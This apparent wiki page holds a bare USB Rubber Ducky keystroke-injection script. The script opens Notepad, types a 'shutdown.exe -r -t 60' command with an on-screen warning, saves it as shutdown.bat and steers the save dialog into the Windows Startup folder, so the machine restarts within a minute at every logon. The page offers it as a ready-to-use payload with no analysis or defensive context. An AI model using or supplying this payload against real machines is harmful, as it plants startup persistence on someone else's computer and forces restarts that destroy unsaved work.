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MeleeStrom edited this page Jul 2, 2014 · 1 revision

DELAY 500 GUI r DELAY 500 STRING notepad DELAY 500 ENTER DELAY 500 STRING shutdown.exe -r -t 60 -c "you have 60 sec to stop this computer from resarting(!!!SAVE YOUR WORK!!!), go to cmd and type shutdown.exe (-)a without brackets. And if you want to stop this from happening every time you logon delete the file from startup." DELAY 550 CTRL s DELAY 500 STRING shutdown.bat DELAY 500 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 700 ENTER DELAY 200 STRING startup DELAY 700 ENTER DELAY 500 TAB DELAY 100 TAB TAB DELAY 100 TAB DELAY 100 TAB DELAY 400 TAB DELAY 100 TAB TAB DELAY 100 TAB DELAY 100 TAB ENTER ALT F4 TAB DELAY 100 ENTER

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